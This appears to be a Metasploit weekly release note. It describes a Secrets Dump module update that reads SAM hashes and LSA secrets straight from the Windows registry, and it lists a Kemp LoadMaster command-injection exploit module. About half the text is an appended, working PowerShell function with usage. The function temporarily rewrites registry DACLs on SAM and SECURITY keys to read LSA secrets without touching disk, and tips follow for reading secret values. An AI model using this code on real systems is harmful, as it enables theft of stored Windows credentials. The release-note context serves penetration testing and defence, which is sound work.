Dump secrets inline

This week, our very own cdelafuente-r7 added a significant improvement to the well-known Windows Secrets Dump module that reduces its footprint when dumping SAM hashes, LSA secrets and cached credentials. The module now reads the required keys directly from the remote Windows Registry instead of saving the full hives to a file on the target and parsing them, as it originally did. The idea comes from a PR proposed by antuache. The technique takes advantage of the WRITE_DAC access right that local administrators hold on the SAM and SECURITY hive keys: it sets a temporary read permission on the keys it needs, reads them, and restores the original security descriptor after each read. The original dump-to-file technique is still available by setting the INLINE option to false. Happy dumping!

New module content (1)

Kemp LoadMaster Unauthenticated Command Injection
Author: Dave Yesland with Rhino Security Labs
Type: Exploit
Pull request: #18972 contributed by DaveYesland
Path: linux/http/progress_kemp_loadmaster_unauth_cmd_injection
AttackerKB reference: CVE-2024-1212
Description: This adds a module targeting CVE-2024-1212, an unauthenticated command injection vulnerability in Kemp Progress LoadMaster versions after 7.2.48.1, patched in 7.2.59.2 (GA), 7.2.54.8 (LTSF) and 7.2.48.10 (LTS).

Enhancements and features (3)

#19048 from cdelafuente-r7 – This updates the windows_secrets_dump module to enable accessing the necessary registry data without writing it to disk first….
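The DACL dance described above, as an added local PowerShell example that is not Metasploit's code (the module does the same thing over the remote registry RPC): open a protected key with only the WRITE_DAC and READ_CONTROL rights that BUILTIN\Administrators already hold, save the original DACL as SDDL, add a non-inheriting ReadKey ACE for the current user, perform the read, and restore the saved descriptor in a finally block. The function name, its parameters and the sample key path are assumptions chosen for this example; it must run from an elevated session.

```powershell
# Added example, not part of the Metasploit module. Requires an elevated
# (high-integrity) administrator session on the local machine.
function Invoke-WithTemporaryReadAccess {
    param(
        [Parameter(Mandatory)][string]$SubKey,       # e.g. 'SECURITY\Policy\Secrets' (assumed path)
        [Parameter(Mandatory)][scriptblock]$Action   # receives a read-only RegistryKey
    )
    $sections = [System.Security.AccessControl.AccessControlSections]::Access
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent().User

    # Open with WRITE_DAC + READ_CONTROL only: no KEY_READ is requested, so this
    # succeeds with the default Administrators ACE on SAM/SECURITY keys.
    $dacKey = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
        $SubKey,
        [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
        [System.Security.AccessControl.RegistryRights]'ChangePermissions, ReadPermissions')
    if (-not $dacKey) { throw "Cannot open HKLM\$SubKey with WRITE_DAC" }

    try {
        # Snapshot the original DACL so it can be restored exactly.
        $originalSddl = $dacKey.GetAccessControl($sections).GetSecurityDescriptorSddlForm($sections)

        # Grant ourselves ReadKey on this key only (no inheritance, so subkeys are untouched;
        # each subkey you need must get its own temporary ACE).
        $rule = New-Object System.Security.AccessControl.RegistryAccessRule(
            $me,
            [System.Security.AccessControl.RegistryRights]::ReadKey,
            [System.Security.AccessControl.InheritanceFlags]::None,
            [System.Security.AccessControl.PropagationFlags]::None,
            [System.Security.AccessControl.AccessControlType]::Allow)
        $modified = $dacKey.GetAccessControl($sections)
        $modified.AddAccessRule($rule)
        $dacKey.SetAccessControl($modified)

        try {
            # A plain read handle now succeeds; hand it to the caller's scriptblock.
            $readKey = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($SubKey, $false)
            if (-not $readKey) { throw "Read open of HKLM\$SubKey failed after ACE was added" }
            try { & $Action $readKey } finally { $readKey.Close() }
        }
        finally {
            # Restore the saved descriptor whether or not the read succeeded.
            $restore = New-Object System.Security.AccessControl.RegistrySecurity
            $restore.SetSecurityDescriptorSddlForm($originalSddl, $sections)
            $dacKey.SetAccessControl($restore)
        }
    }
    finally { $dacKey.Close() }
}

# Constructed usage: list LSA secret names without saving the hive to disk.
# Reading a secret's CurrVal needs the same treatment on that subkey.
Invoke-WithTemporaryReadAccess -SubKey 'SECURITY\Policy\Secrets' -Action {
    param($key)
    $key.GetSubKeyNames()
}
```

Two practical notes. First, registry ACEs are materialised per key, so granting a non-inheriting ACE on `SECURITY\Policy\Secrets` lets you enumerate secret names but not read `CurrVal` beneath them; repeat the grant for each key you touch rather than setting an inheritable ACE on the hive root, which would rewrite and later have to restore every subkey's DACL. Second, the footprint reduction is about files on disk, not invisibility: a defender auditing object access or permission changes on these keys still sees the DACL being modified and restored.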